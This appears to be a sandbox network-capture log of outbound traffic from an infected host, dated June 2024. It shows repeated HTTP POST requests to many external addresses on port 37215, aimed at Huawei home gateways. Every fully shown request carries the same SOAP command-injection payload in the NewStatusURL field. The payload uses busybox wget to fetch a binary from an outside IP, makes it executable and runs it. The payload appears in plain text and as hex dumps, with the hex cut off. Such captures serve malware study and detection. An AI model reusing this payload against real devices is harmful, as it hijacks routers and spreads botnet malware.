                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1153192.168.2.154036494.99.203.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.933707952 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1154192.168.2.1543440181.219.152.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.935432911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1155192.168.2.154649445.174.154.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.937870979 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1156192.168.2.1559072157.241.144.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.940038919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1157192.168.2.1540184156.15.97.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.943348885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1158192.168.2.1552268102.99.252.20837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.945898056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1159192.168.2.155115845.145.22.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.946763039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1160192.168.2.1542680186.219.243.3137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.947423935 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1161192.168.2.1556864138.22.197.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.948276043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1162192.168.2.1541536122.76.40.21937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.948833942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1163192.168.2.1533080190.192.168.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.949146032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
